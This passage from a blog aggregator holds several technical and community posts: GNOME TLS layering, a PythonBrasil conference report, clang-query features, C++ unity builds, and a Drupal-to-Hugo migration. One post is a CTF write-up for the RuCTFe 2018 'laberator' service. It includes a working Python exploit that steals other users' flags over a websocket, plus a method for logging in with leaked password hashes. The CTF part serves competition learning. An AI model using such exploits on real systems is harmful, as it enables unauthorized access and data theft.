Haha no, it uses a dynamically-loadable extension point system to allow you to pick your choice of OpenSSL or GnuTLS! (Support for NSS was started but never finished.) This is OK because embedded systems vendors don’t use GPL applications and have no problems with OpenSSL, while desktop Linux users don’t produce tivoized embedded systems and have no problems with LGPLv3. So if you’re using desktop Linux and point WebKitGTK+ at an HTTPS address, then GLib is going to load a GIO extension point called glib-networking, which implements all of GIO’s TLS APIs — notably GTlsConnection and GTlsCertificate — using GnuTLS. But if you’re building an embedded system, you simply don’t build or install glib-networking, and instead build a different GIO extension point called glib-openssl, and libsoup will create GTlsConnection and GTlsCertificate objects based on OpenSSL instead. Nice! And if you’re Centricular and you’re building GStreamer for Windows, you can use yet another GIO extension point, glib-schannel, for your native Windows TLS goodness, all hidden behind GTlsConnection so that GStreamer (or whatever application you’re writing) doesn’t have to know about SChannel or OpenSSL or GnuTLS or any of that sad complexity.

Now you know why the TLS extension point system exists in GIO. Software licenses! And you should not be surprised to learn that direct use of any of these crypto libraries is banned in libsoup and WebKit: we have to cater to both embedded system developers and to GPL-licensed applications. All TLS library use is hidden behind the GTlsConnection API, which is really quite nice to use because it inherits from GIOStream. You ask for a TLS connection, have it handed to you, and then read and write to it without having to deal with any of the crypto details.

As a recap, the layering here is: WebKit -> libsoup -> GIO (GLib) -> glib-networking (or glib-openssl or glib-schannel).

So when Epiphany fails to load a webpage, and you’re looking at a TLS-related error, glib-networking is probably to blame. If it’s an HTTP-related error, the fault most likely lies in libsoup. Same for any other GNOME applications that are having connectivity troubles: they all use the same network stack. And there you have it!

P.S. The glib-openssl maintainers are helping merge glib-openssl into glib-networking, such that glib-networking will offer a choice of GnuTLS or OpenSSL, obsoleting glib-openssl. This is still a work in progress. glib-schannel will be next!

P.P.S. libcurl also gives you multiple choices of TLS backend, but makes you choose which at build time, whereas with GIO extension points it’s actually possible to choose at runtime from the selection of installed extension points. The libcurl approach is fine in theory, but creates some weird problems, e.g. different backends with different bugs are used on different distributions. On Fedora, it used to use NSS, but now uses OpenSSL, which is fine for Fedora, but would be a license problem elsewhere. Debian actually builds several different backends and gives you a choice, unlike everywhere else. I digress.

Achievement unlocked! I spoke at PythonBrasil[14]

Planet Debian - Mon, 12/11/2018 - 3:49am
PyLadies (and going to PythonBrasil)

PythonBrasil is the national Python community conference that happens every year, usually in October, in Brazil.

I attended PythonBrasil for the first time in 2016, the year we had started PyLadies Porto Alegre. Back then, we were a very small group and I was the only one to go. It was definitely one of the best experiences I ever had, which, of course, set a very high standard for every single tech event I attended afterwards.

Because of the great time I had there, I wanted to bring more and more women from PyLadies Porto Alegre to experience PythonBrasil in the following editions. So, during the PyLadies Porto Alegre 1st birthday party, I encouraged the other women to submit activities and to try to go to the conference that would happen in Belo Horizonte.

When attending it for the second time, I didn't go alone. Daniela Petruzalek had her talk accepted. Claudia, also from PyLadies Porto Alegre, was able to go for the first time thanks to the support of the PyLadies Brazil crowdfunding campaign. To me, one of the most memorable things about this PythonBrasil was "The (unofficial) PyLadies House", where I stayed. It was a huge house that we rented and shared between about 18 people to help with the accommodation costs for all of us. We shared breakfasts and rides and stories. We watched other PyLadies rehearse their talks, gave lightning tech talks late at night and we even had a birthday party!

So, this year? The idea of encouraging PyLadies POA submissions, something that had come up almost spontaneously last year, matured, and we worked to make the PyLadies Porto Alegre 2nd Birthday Party an all-day event with that purpose. The schedule? Lightning talks about Python projects from its members, talks about experiences as participants and as speakers at Python Brasil and... we also had help from Vinta Software's Flavio Juvenal, who acted as a mentor to the women who were considering submitting an activity to PythonBrasil. He even made a great GitHub repo with a proposal checklist to assist us, and he made himself available for reviewing the proposals we wrote.

The result? We had more than 6 women from PyLadies Porto Alegre with activities accepted to PythonBrasil[14]. Some of them even had more than one activity (tutorial and talk) accepted.

I was among the ones who had been accepted. Ever since attending the conference for the first time, it had been a goal of mine to give a talk at PythonBrasil. But not just any talk: I wanted it to be a technical talk. At last, what I learned during Outreachy and how I had used it for a real task in a job finally gave me the confidence to do so. I felt ready, so I submitted and I was accepted.

I made my way to Natal, the capital of the Rio Grande do Norte (RN) state (in the Northeast of Brazil), two days before the conference was to start, since it was the cheapest ticket I could find. Besides, the PyLadiesBRConf was scheduled to happen on the day before and I was hoping I would be able to attend. PyLadiesBRConf was a full day of talks organized by what one could call "the original PyLadies Brazil", since the PyLadies community in Brazil actually started in Natal and was simply named that (afterwards we started naming the groups after their cities).

The PythonBrasil[14] conference

On the next day, PythonBrasil[14] started. It was the biggest PythonBrasil to happen yet, with over 700 attendees (plus staff). Like many PyCons, the conference days are usually split between tutorials, talks and sprints.

Day 1 - tutorials

The tutorials have free admittance and are open to anyone (no matter whether they have bought a ticket to the conference or not). Unfortunately, due to the capacity of the rooms where they would be held, there was a limit of 100 registrations for each tutorial. When I went to register for the tutorials of the first day, they were already all booked. Even so, the tutorial I was most interested in, "Building REST APIs with Django REST Framework", had to be cancelled anyway because the presenter missed his flight. :( On this first day, I met with a few PyLadies and people from the Python community who were in Natal, I walked on the beach and I focused on the preparation for my talk.

Day 2 - tutorials

I must confess that I had registered for the tutorial on Pandas ("It's not witchcraft, it's Pandas", by Fernando Masanori) merely because Flavio Juvenal had mentioned Pandas on the feedback for my proposal. I had no idea what that was actually about and why would one even use Pandas. By noon on that second day, though, I was so very glad that I did (and that I got a spot in it!). I learned a bit about Pandas and I also learned about how to use Jupyter Notebooks, something I had never tried before either. I found both Pandas and Jupyter easy and interesting and I look forward to do some projects using them.

Back when we (PyLadies) were discussing submissions to PythonBrasil with Professor Masanori, Data Structures was something that both I and another PyLady (Debora) had mentioned we had been meaning to focus on and study more. So, he came up with the idea for a tutorial about it, called: "Data Structures are <3".

In this tutorial, I found it quite interesting to learn and play with recursive functions and with searching algorithms. I was quite impressed with learning about heapsort (who knew doing such a thing could be so cool?).

Image Licensed CC BY-SA 3.0 Attribution: RolandH

Everything at PythonBrasil (tutorials, talks and sprint) happened in the same hotel. So, after the tutorials were over, I hung around with some of the people of the community who were staying at the same hostel. The organizing team asked for help in putting together the conference kit (bag, t-shirt, IDs and flyers). We made sort of a production line and cut the time considerably short for the volunteer team.

Afterwards, I was still processing everything that I had learned and I wanted to try the new things, so I went back to the hostel to code some more. I confess that I was so hooked that I stayed up until 2 am to create the code with Pandas that I would incorporate in my talk as a bonus content.

Day 3 - talks

On this day, I had the opportunity to meet and socialize with a lot of people who were coming to Python Brasil for the first time. It was particularly delightful to see a lot of students from a public technical school (Instituto Federal) attending the conference with their teachers. They had been given tickets, which allowed them to attend the (otherwise very expensive) conference and I must say that this is the kind of inclusion that I always want to see in tech events.

From the talks, I want to highlight these moments: I learned about Scrapy (which I have been playing around with a bit since then), I watched an awesome talk about using Python with Physics (although I don't have in-depth knowledge of Physics, I count it as a success that I could follow the talk in its entirety, so cheers to the presenter, Ana Maria, from PyLadies Teresina) and I must mention that I was quite impressed by Elias Dorneles' talk about developing software for the command line. Even his "slides" were made there, and there were drawings and music too, all made with Python and using the command line!

Day 4 - talks

The second day of talks brought us the much needed talk about AfroPython, an initiative that was created to increase the representation of Black and native Brazilian people in our community.

A talk that gathered a lot of attention (and overcrowded the room it was being given in!) was the one about using Python to understand data about suicides to help prevent them. It's a hard subject for many people, but it is one that we definitely need to talk about.

Andreza Rocha's talk "Dear White People (from HR)" also touched a lot of people. She drew from her own experiences as a tech recruiter to question the homogeneity that we (still) have in tech. "Who are the ones who recruit the people?" she asked. "For us to be recruited, we (black people) have to be alive."

It was on this day that a violation of Python Brasil's Code of Conduct happened. After a PyLady gave her talk, a male participant used the time for questions not to ask a question, but to, let's say... eulogize the woman who had given the talk... by demeaning all the other women who had presented before her and weren't "technical enough" or something like that. Oh, how thick we must make our skin to be able to come up to a stage knowing we might be subjected to a moment like that... I am glad the PyLady was experienced and level-headed enough to own the moment and give him the comeback he deserved. * sigh * (After the conference, the organization published a note about the CoC violation.)

Contrary to popular belief, yes, I did watch the last keynote of the day, even though it was Facebook's. And it did surprise me. Rainer Alves spoke about the shifts in corporate culture that happened when they merged infrastructure and development people into a "Production Engineering" department. What I found most relevant, though, was the slide below, about "blameless postmortems". After all, how do you actually correct a malpractice or an error other than working collectively to figure out the way? "It's not about what you did, it's about what went wrong."

This was the day we took the official photo of Python Brazil:

It was also the day we took a picture with the women who were at the conference:

Day 5 - talks

Sunday arrived and it was time for: 'But can you open it on Excel?' Exporting to TXT, CSV and JSON with Python ("'Mas dá pra abrir no Excel?' Exportando para TXT, CSV e JSON com Python"). The focus of my talk was how to export data to those formats using mainly the tools offered by the Python Standard Library. But, as I mentioned before, thanks to what I learned during the PythonBrasil tutorials, I was able to add some extra content and show how the export to CSV could be done with Pandas as well. I was very glad about this, even though I felt like there was so little time to go over all the content I wanted to present (I had time to go through all my slides and for a very brief demonstration, but that was it). I think it went well. I even managed to speak briefly about Free Software (since I don't use Excel, and I made my demonstration with LibreOffice).
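
For readers curious about what that looks like in practice, here is a minimal sketch (not my actual talk code, with made-up sample data) of exporting the same records with the standard library and with Pandas:

import csv
import json

import pandas as pd

# hypothetical sample records, just for illustration
rows = [
    {"name": "Ada", "language": "Python"},
    {"name": "Grace", "language": "COBOL"},
]

# CSV with the standard library
with open("people.csv", "w", newline="") as f:
    writer = csv.DictWriter(f, fieldnames=["name", "language"])
    writer.writeheader()
    writer.writerows(rows)

# JSON with the standard library
with open("people.json", "w") as f:
    json.dump(rows, f, ensure_ascii=False, indent=2)

# the same CSV export, this time with Pandas
pd.DataFrame(rows).to_csv("people_pandas.csv", index=False)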

When they opened time for questions, I explicitly said "Questions, not comments, please", hoping to avoid mansplaining or another incident like the one that had happened the day before. And I know people judged me for that, but... I am also aware they judged me more harshly because I am a woman. After all, in previous editions we have had male keynote speakers making the very same comment without people being offended by it.

This did not stop people from coming to talk to me afterwards with comments about their experiences anyway - that was definitely better, because I felt like I could talk to them more properly and personally about it, having more time than the 5 minutes allotted to questions and not having to answer under a full audience's scrutiny.

Other than my own talk, I would like to mention some other talks I attended. There was a talk about advanced functional programming ("Going further than map, filter and reduce"), which is something I find interesting to have some idea about, even though I don't quite fully grasp it yet. There was also the PyLadies' talk, where a group representing each region of Brazil with a PyLadies group talked about the work we have been doing. Andressa spoke for PyLadies Porto Alegre and talked about all the work we have been doing, in particular all the Django Girls workshops we have helped at in Rio Grande do Sul since the last PythonBrasil.

Ana Paula gave a fun talk about genetic algorithms with Python, using the language to work with biology data. Another subject that I am not very familiar with, but that I found quite interesting. And I also saw Camilla Martins live coding to run Python with Node.js on the big stage.

During the lightning talks, something amazing happened: the Instituto Federal students went up on the stage and talked about their experience at PythonBrasil using a regional form of sung poetry called Cordel. It was really remarkable.

Also during the lightning talks, we had Thrycia Oliveira, a former participant of Django Girls, calling attention to the fact that we need to have spaces in the community that are inclusive of parents, in particular of moms. She said that the PythonBrasil organization had tried to arrange this, and she thanked them for that, but it had not been possible. I also remember when she told me about her participation in Python Nordeste (a regional conference that preceded PythonBrasil) and how she had to alternate with her husband the days she attended, because one of them had to stay at home to watch over their kids (it wasn't really a kids-inclusive event).

This day ended with Betina's keynote "Does this algorithm have a soul?", a very relevant question for the state of software development today. Her talk spoke to me and to a lot of people in the audience, and I can't picture a more welcoming community for it to have been given to.

Day 6 - sprints

Sadly, Python Brazil had to come to an end. Day 6 happened on a Monday, which meant that the majority of the people, including almost all the PyLadies, had already returned home. :( For personal reasons that I would rather not talk about publicly, I chose not to take part in the coding sprint to help with APyB's site. Instead, because I am looking for work, I used this day mostly for networking and applying to jobs I had heard about during PythonBrasil. I don't have wifi at home and I need to take any opportunity I can get to use the internet to send CVs and take technical tests, so that is what I did.

Wrapping things up...

And, of course, to finish this post I ought to mention the beach... On my last two days in Natal, I was gifted with the awesomeness that is the ocean at Ponta Negra during the full moon. There are no words to describe the beauty of it (I am sorry I couldn't take a good picture of it).

Thank you notes

I know this post ended up being extensive, but how can one summarize an experience with an event as huge as PythonBrasil? It's hard. I think it's safe to say that to be part of something like that has a lasting impact in my life. All the technical content I have heard about gives me motivation to keep studying and learning new things. All the people I have met, friends old and new, give meaning to the work to make the Python community more open and inclusive.

So, I cannot thank Outreachy enough for making my participation in Python Brasil possible!

This whole journey would not be possible without the awesome people below, so I would like to also thank:

  • My Outreachy mentors Daniel Pocock and Bruno for the support during the internship and beyond
  • Flavio Juvenal for the feedback on my proposal and giving the golden tip about Pandas
  • Andreza Rocha for not letting me give up on my dream to go to this PythonBrasil
  • Felipe de Morais and Betina Costa for sitting in the very front row and nodding when I was unsure during my talk
  • Elias Dorneles for the support when applying to Outreachy and for reviewing my slides
  • PyLadies Brazil for being the safety net so many women can rely on
Renata https://rsip22.github.io/blog/ Renata's blog

Stephen Kelly: Future Developments in clang-query

Planet Ubuntu - Dje, 11/11/2018 - 11:46md
Getting started – clang-tidy AST Matchers

Over the last few weeks I published some blogs on the Visual C++ blog about Clang AST Matchers. The series can be found here:

I am not aware of any similar series existing which covers creation of clang-tidy checks, and use of clang-query to inspect the Clang AST and assist in the construction of AST Matcher expressions. I hope the series is useful to anyone attempting to write clang-tidy checks. Several people have reported to me that they have previously tried and failed to create clang-tidy extensions, due to various issues, including lack of information tying it all together.

Other issues with clang-tidy include the fact that it relies on the “mental model” a compiler has of C++ source code, which might differ from the “mental model” of regular C++ developers. The compiler needs to have a very exact representation of the code, and needs to have a consistent design for the class hierarchy representing each standard-required feature. This leads to many classes and class hierarchies, and a difficulty in discovering what is relevant to a particular problem to be solved.

I noted several problems in those blog posts, namely:

  • clang-query does not show AST dumps and diagnostics at the same time
  • Code completion does not work with clang-query on Windows
  • AST Matchers which are appropriate to use in contexts are difficult to discover
  • There is no tooling available to assist in discovery of source locations of AST nodes

Last week at code::dive in Wroclaw, I demonstrated tooling solutions to all of these problems. I look forward to video of that talk (and videos from the rest of the conference!) becoming available.

Meanwhile, I’ll publish some blog posts here showing the same new features in clang-query and clang-tidy.

clang-query in Compiler Explorer

Recent work by the Compiler Explorer maintainers adds the possibility to use source code tooling with the website. The compiler explorer contains new entries in a menu to enable a clang-tidy pane.

clang-tidy in Compiler Explorer

I demonstrated using Compiler Explorer to run the clang-query tool at the code::dive conference, building upon the recent work by the Compiler Explorer developers. This feature will be upstreamed in time, but can be used with my own AWS instance for now. It is suitable for exploring the effect that changing source code has on match results and, orthogonally, the effect that changing the AST Matcher has on the match results. It is also accessible via cqe.steveire.com.

It is important to remember that Compiler Explorer is running clang-query in script mode, so it can process multiple let and match calls, for example. The new command set print-matcher true helps distinguish which matcher causes which piece of output. The help command also lists the new features.
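As a rough sketch (the matcher expression and the bound name here are my own illustrations, not taken from the original posts), a script fed to clang-query in this mode could look like:

set print-matcher true
let fns functionDecl(isDefinition()).bind("f")
match fns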

The issue of clang-query not printing both diagnostic information and AST information at the same time means that users of the tool need to alternate between writing

set output diag

and

set output dump

to access the different content. Recently, I committed a change to make it possible to enable both dump and diag output from clang-query at the same time. New commands follow the same structure as the set output command:

enable output dump
disable output dump

The set output <feature> command remains as an “exclusive” setting to enable only one output feature and disable all others.
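So, to get both the diagnostic and the AST dump for each match at the same time (my own illustration of the commands described above), one can now run:

enable output diag
enable output dump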

Dumping possible AST Matchers

This command design also enables the possibility of extending the features which clang-query can output. Up to now, developers of clang-tidy extensions had to inspect the AST corresponding to their source code using clang-query and then use that understanding of the AST to create an AST Matcher expression.

That mapping to and from the AST “mental model” is not necessary. New features I am in the process of upstreaming to clang-query enable the output of AST Matchers which may be used with existing bound AST nodes. The command

enable output matcher

causes clang-query to print out all matcher expressions which can be combined with the bound node. This cuts out the requirement to dump the AST in such cases.

Inspecting the AST is still useful as a technique to discover possible AST Matchers and how they correspond to source code. For example if the functionDecl() matcher is already known and understood, it can be dumped to see that function calls are represented by the CallExpr in the Clang AST. Using the callExpr() AST Matcher and dumping possible matchers to use with it leads to the discovery that callee(functionDecl()) can be used to determine particulars of the function being called. Such discoveries are not possible by only reading AST output of clang-query.
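For instance (a minimal sketch of my own, not taken from the original series), given source like the following, a matcher such as callExpr(callee(functionDecl(hasName("foo")))) matches the call inside bar() and gives access to the declaration of foo through the callee:

// example.cpp -- hypothetical example source
int foo(int x) { return x + 1; }

int bar() {
    // This call is a CallExpr in the Clang AST; callee(functionDecl(...))
    // lets the matcher reach the declaration of foo from it.
    return foo(2);
}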

Dumping possible Source Locations

The other important discovery space in creation of clang-tidy extensions is that of Source Locations and Source Ranges. Developers creating extensions must currently rely on the documentation of the Clang AST to discover available source locations which might be relevant. Usually though, developers have the opposite problem. They have source code, and they want to know how to access a source location from the AST node which corresponds semantically to that line and column in the source.

It is important to make use of a semantically relevant source location in order to build reliable tools which refactor at scale and without human intervention. For example, a cursory inspection of the locations available from a FunctionDecl AST node might lead to the belief that the return type is available at the getBeginLoc() of the node.

However, this is immediately challenged by the C++11 trailing return type feature, where the actual return type is located at the end. For a semantically correct location, you must currently use

getTypeSourceInfo()->getTypeLoc().getAs<FunctionTypeLoc>().getReturnLoc().getBeginLoc()

It should be possible to use getReturnTypeSourceRange(), but a bug in clang prevents that as it does not appreciate the trailing return types feature.
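A small illustration of the difference (my own sketch; the comments restate the behaviour described above rather than verified compiler output):

// Classic syntax: the return type sits at the start of the declaration,
// so the location reported by getBeginLoc() happens to coincide with it.
int classic(int x);

// C++11 trailing return type: getBeginLoc() still points at 'auto', while
// the actual return type 'int' only appears at the end of the declaration.
auto trailing(int x) -> int;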

Once again, my new output feature of clang-query presents a solution to this discovery problem. The command

enable output srcloc

causes clang-query to output the source locations by accessor and caret corresponding to the source code for each of the bound nodes. By inspecting that output, developers of clang-tidy extensions can discover the correct expression (usually via the clang::TypeLoc hierarchy) corresponding to the source code location they are interested in refactoring.

Next Steps

I have made many more modifications to clang-query which I am in the process of upstreaming. My Compiler Explorer instance is listed as the 'clang-query-future' tool, while the clang-query-trunk tool runs the current trunk version of clang-query. Both can be enabled for side-by-side comparison of the future clang-query with the existing one.

Jussi Pakkanen: Compile any C++ program 10× faster with this one weird trick!

Planet GNOME - Dje, 11/11/2018 - 11:09md
tl/dr: Is it unity builds? Yes.
I would like to know more!

At work I have to compile a large code base from scratch fairly often. One of its components is a 3D graphics library. It takes around 2 minutes 15 seconds to compile on an 8-core i7. After a while I got bored with this and converted the system to use a unity build. In all simplicity, what that means is that if you have a target consisting of files foo.cpp, bar.cpp, baz.cpp and so on, you create a cpp file with the following contents:
#include<foo.cpp>
#include<bar.cpp>
#include<baz.cpp>
Then you would tell the build system to build that instead of the individual files. With this method the compile time dropped to 1m 50s, which does not seem like much of a gain, but the compilation used only one CPU core. The remaining 7 are free for other work. If the project had 8 targets of roughly the same size, building them one after the other would take 18 minutes. With unity builds they would take the exact same 1m 50s assuming perfect parallelisation, which happens fairly often in practice.

Wait, what? How is this even?

The main reason that C++ compiles slowly has to do with headers. Merely including a few headers from the standard library brings in tens or hundreds of thousands of lines of code that must be parsed, verified, converted to an AST and code-generated in every translation unit. This is extremely wasteful, especially given that most of that work is not used but is instead thrown away.
With a unity build, every #include is processed only once, regardless of how many times it is used in the component source files.
Basically this amounts to a caching problem, which is one of the two really hard problems in computer science, in addition to naming things and off-by-one errors.

Why is this not used by everybody then?

There are several downsides and problems. You can't take any old codebase and compile it as a unity build. The first blocker is that things inside source files leak into other ones, since they are all textually included one after the other. For example, if two files each declare a static function with the same name, the result is a name clash and a compilation failure, as the sketch below illustrates. Similarly, things like using namespace std declarations leak from one file to another, causing havoc.
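A small illustrative sketch (the file and function names are made up): each file is valid on its own, but the concatenated unity source ends up defining helper() twice in the same translation unit.

// a.cpp
static void helper() { /* ... */ }
void do_a() { helper(); }

// b.cpp -- fine as a separate translation unit
static void helper() { /* ... */ }
void do_b() { helper(); }

// unity.cpp
#include<a.cpp>
#include<b.cpp>   // error: redefinition of 'helper' in the combined translation unit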
But perhaps the biggest problem is that every recompilation takes the same time. An incremental rebuild where one file has changed takes a few seconds or so, whereas a unity build takes the full 1m 50s every time. This is a major roadblock to iterative development and the main reason unity builds are not widely used.

A possible workflow with Meson

For simplicity let's assume that we have a project that builds and works with unity builds. Meson has an automatic unity build file generator that can be enabled by setting the value of the unity build option.
This solves the basic build problem but not the incremental one. However usually you'd develop only one target (be it a library, executable or module) and want to build only that one incrementally and everything else as a unity build. This can be done by editing the build definition of the target in question and adding an override option:
executable(..., override_options : ['unity=false'])
Once you are done you can remove the override from the build file to return everything back to normal.

How does this tie in with C++ modules?

Directly? Not in any way really. However one of the stated advantages of modules has always been faster build times. There are a few module implementations but there is very little public data on how they behave with real world codebases. During a CppCon presentation on modules Google's Chandler Carruth mentioned that in Google's code base modules resulted in a 30% build time reduction.
It was not mentioned whether Google uses unity builds internally but they almost certainly don't (based on things such as this bug report on Bazel). If we assume that theirs is the fastest existing "classical" C++ build mechanism, which it probably is, the conclusion is that it is an order of magnitude slower than a unity build on the same source files. A similar performance gap would probably not be tolerated in any other part of the C++ ecosystem.
The shoemaker's children go barefoot.

RuCTFe 2018 laberator

Planet Debian - Dje, 11/11/2018 - 4:33md

Team: FAUST
Crew: izibi, siccegge
CTF: RuCTFe 2018

The service

A web service written in Go. It has some pretty standard functionality (register, login, store a string), with the logic somewhat dispersed between the main web server in main.go, some stuff in the templates, and the websockets endpoint in command_executor.go. Obviously you have to extract the strings ("labels") from the gameserver. The phrase stored when creating an account was also used to store some more flags.

Client side authentication for labels

A gem from the viewLabel JavaScript function: for some reason the label's owner is checked client-side, after the data has already been returned to the client.

let label = JSON.parse(e.data);
if (label.Owner !== getLoginFromCookies()) {
    return;
}

And indeed, the websocket view method checks for some valid session but doesn't concern itself with any further validation of access privileges. As long as you have any valid session and can figure out websockets, you can get just about any label you like.

"view": func(ex *CommandExecutor, data []byte) ([]byte, error) {
    var viewData ViewData
    err := json.Unmarshal(data, &viewData)
    if err != nil {
        return nil, createUnmarshallingError(err, data)
    }
    cookies := parseCookies(viewData.RawCookies)
    ok, _ := ex.sm.ValidateSession(cookies)
    if !ok {
        return nil, errors.New("invalid session")
    }
    label, err := ex.dbApi.ViewLabel(viewData.LabelId)
    if err != nil {
        return nil, errors.New(fmt.Sprintf("db request error: %v, labelId=(%v)", err.Error(), viewData.LabelId))
    }
    rawLabel, err := json.Marshal(*label)
    if err != nil {
        return nil, errors.New(fmt.Sprintf("marshalling error: %v, label=(%v)", err.Error(), *label))
    }
    return rawLabel, nil
},

Putting things together: the exploit creates a fresh account, generates a label (to figure out the ID of the most recent labels) and then bulk-loads the last 100 labels:

#!/usr/bin/env python3

import requests
import websocket
import json
import sys
import string
import random
import base64


def main():
    host = sys.argv[1]
    session = requests.session()
    password = [i for i in string.ascii_letters]
    random.shuffle(password)
    username = ''.join(password[:10])
    phrase = base64.b64encode((''.join(password[10:20])).encode()).decode()
    password = base64.b64encode((''.join(password[20:36])).encode()).decode()
    x = session.get('http://%s:8888/register?login=%s&phrase=%s&password=%s' % (host,username,phrase,password))
    x = session.get('http://%s:8888/login?login=%s&password=%s' % (host,username, password))
    raw_cookie = 'login=%s;sid=%s' % (x.cookies['login'], x.cookies['sid'])

    ws = websocket.create_connection('ws://%s:8888/cmdexec' % (host,))
    data = {'Text': 'test', 'Font': 'Arial', 'Size': 20, 'RawCookies': raw_cookie}
    ws.send(json.dumps({"Command": "create", "Data": json.dumps(data)}))
    # make sure create is already commited before continuing
    ws.recv()

    data = {'Offset': 0, 'RawCookies': raw_cookie}
    ws.send(json.dumps({"Command": "list", "Data": json.dumps(data)}))
    stuff = json.loads(ws.recv())
    lastid = stuff[0]['ID']

    for i in range(0 if lastid-100 < 0 else lastid-100, lastid):
        ws = websocket.create_connection('ws://%s:8888/cmdexec' % (host,))
        try:
            data = {'LabelId': i, 'RawCookies': raw_cookie}
            ws.send(json.dumps({"Command": "view", "Data": json.dumps(data)}))
            print(json.loads(ws.recv())["Text"])
        except Exception:
            pass


if __name__ == '__main__':
    main()

Password Hash

The hash module used is obviously suspect. It consists of a binary and a wrapper, freshly uploaded to GitHub just the day before. Also, if you create a test account with a short password (say, test) you end up with a hash that contains the password in plain text (say, testTi\x02mH\x91\x96U\\I\x8a\xdd). Looking closer, if you register with a password that is exactly 16 characters (aaaaaaaaaaaaaaaa) you end up with a 16-character hash that is identical to it. This also means the password hash is a valid password for the account.

Listening to tcpdump for a while you'll notice interesting entries:

[{"ID":2,"Login":"test","PasswordHash":"dGVzdFRpAm1IkZZVXEmK3Q==","Phrase":{"ID":0,"Value":""}}]

See the password hash there? Turns out this comes from the regularly scheduled last_users websocket call.

"last_users": func(ex *CommandExecutor, _ []byte) ([]byte, error) {
    users := ex.dbApi.GetLastUsers()
    rawUsers, err := json.Marshal(*users)
    if err != nil {
        return nil, errors.New(fmt.Sprintf("marshalling error: %v, users=(%v)", err.Error(), *users))
    }
    return rawUsers, nil
},

So call last_users (it doesn't even need a session), log in as each of the last 20 users and just load all their labels. Good thing passwords are transferred base64-encoded, so there is no need to worry about non-printable characters in the password hash.

Additionally, sessions were generated with the broken hash implementation. This probably would have allowed computing session IDs.

Christoph Egger https://weblog.christoph-egger.org/ Christoph's last Weblog entries

Migrating from Drupal to Hugo

Planet Debian - Dje, 11/11/2018 - 12:30md
TL;DR: Migrating my website from Drupal 7 to Hugo

Jump directly to the end titled Migration to Hugo

Initial website

Looking back at my website's history, the domain was first registered sometime in 2003. Back then, it was mostly a couple of HTML pages. Being (and still being) a novice at web development, my website was mostly based on ideas from others. IIRC, for the bare HTML one, I took a lot of the look-and-feel details from Miss Garrels' website.

First blog

My initial blog was self-hosted with a blogging software written in PHP, named PivotX. The website for it still works, so hopefully the project is still alive. It was a pretty good tool for the purpose: very lean, with support for data backends in both MySQL and flat files. The latter was important to me as I wanted to keep it simple.

Drupal

My first interaction with Drupal was with its WSOD. That was it until I revisited it while evaluating different FOSS web tools to build a community site for one of my previous employers.

Back then, we tried multiple tools: Jive, Joomla, WordPress and many more. But we finally settled on Drupal. The requirement was to have something which would filter content under nested categories. Of the many things tried, the only one which seemed to be able to do it was Drupal with its Taxonomy feature, along with a couple of community-driven add-on modules.

We built it, but there were other challenges. It was hard to find people who were good with Drupal. I remember interviewing around 10-15 people who could take over the web portal and maintain it, and still not being able to fill the position. Eventually, I ended up maintaining the portal by myself.

Migrating my website to Drupal

The easiest way to deal with the maintenance was to have one more live portal running Drupal. My website, which back then had ambitious goals of also serving as an online shopping cart, was the perfect candidate. So I migrated my website from PivotX to Drupal 6. Drupal had a nice RSS Import module which was able to pull in most of the content, except the comments on each article. I think that is more of a limitation of RSS feeds, but the only data import path I could find back then was to import content through RSS feeds.

Initially, Drupal looked like a nice tool. Lots of features and a vibrant community made it very appealing. And I had always wanted to build some skills hands-on (that's how the job market likes it; irrespective of the skills, it is the hands-on experience that they evaluate) by using Drupal at both the employer's community portal and my personal website.

Little did I know that running/maintaining a website is one thing, whereas extending it is another (mostly expensive) affair.

Drupal 7

That was the first blow. For a project serving as a platform, Drupal was a PITA when dealing with migrations. And I am not talking about migrations to a different platform, but rather about an upgrade from one major release to another.

Having used Debian for quite some time, this approach from Drupal brought back memories of the past, of the Red Hat Linux and SuSE Linux distributions, where upgrades were not a common term and, with every major release of the distribution, people were mostly recommended to re-install.

Similar was the case with Drupal. With every major release, many (core) modules would be dropped and many add-on modules would lose support. Neither the project nor the community around it was helpful anymore.

But somehow, I eventually upgraded to Drupal 7. I did lose a lot of functionality. My nested taxonomy was gone and my themes were all broken. For the web novice that I am, it took me some time to fix those issues.

But the tipping point came with Drupal 8. It took the pain to the next level, repeating the same process of dropping modules and breaking functionality; I never heard much about backward compatibility on this platform.

Hugo

For quite some time I kept looking for a migration path away from Drupal 7. I did not care what it was as long as it was FOSS, and had an active community around it. The immediate first choice was WordPress. By this time, my web requirements had trimmed down. No more did I have outrageous ideas of building all solutions (Web, Blog, Cart) in a single platform. All I did was mostly blog and had a couple of basic pages.

The biggest problem was migration. WP has a module that does migration. But, for whatever annoying reason, the free version of it would only pick 7 articles out of the total. And it did not import comments. So with WP I would still have been exposed to the same annoyances and to my limitations with web technologies. This migration path did not enthuse me much; it felt like the Hindi idiom आसमान से गिरे और खजूर में अटके (fallen from the sky, only to get stuck in a date palm; in other words, out of the frying pan into the fire).

I also attempted Jekyll and Hugo. My limited initial attempts were disappointing. Jekyll had an import module which, IIRC, did not work properly. Similar was the case with Hugo, which has a tool listed on its migration page, drupal2hugo, that is disappointing right from the start.

With nothing much left, I just kept postponing my (desperate) plans to migrate.

Migration to Hugo

Luckily, I was able to find some kind soul who had shared migration scripts to help migrate from Drupal 7 to Hugo. Not everything could be migrated (I had to let go of the comments), but I was not in a position to wait much longer.

With very minimal changes to adapt it to my particular setup, I was able to migrate most of my content; the adapted script is included at the end of this post. Now, my website is built with Hugo from Markdown. More than the tool, I am happy to have the data available in a much more standard format.

If there's one thing that I'm missing on my website, it is mostly the commenting system. I would love to have a simple way to accept user comments integrated into Hugo itself, which would just append those comments to their respective posts. Hopefully soon, when I have (some more) free time.

<?php
define('DRUPAL_ROOT', __DIR__);
include_once(DRUPAL_ROOT . '/includes/bootstrap.inc');
drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL);

$nids = db_query('SELECT DISTINCT(nid) FROM {node}')->fetchCol();
$nodes = node_load_multiple($nids);

foreach ($nodes as $node) {
    $front_matter = array(
        'title' => $node->title,
        'date' => date('c', $node->created),
        'lastmod' => date('c', $node->changed),
        'draft' => 'false',
    );

    if (count($node->taxonomy_vocabulary_2[LANGUAGE_NONE])) {
        $tags = taxonomy_term_load_multiple(
            array_column($node->taxonomy_vocabulary_2[LANGUAGE_NONE], 'tid')
        );
        $front_matter['tags'] = array_column($tags, 'name');
    }

    if (count($node->taxonomy_vocabulary_1[LANGUAGE_NONE])) {
        $cat = taxonomy_term_load_multiple(
            array_column($node->taxonomy_vocabulary_1[LANGUAGE_NONE], 'tid')
        );
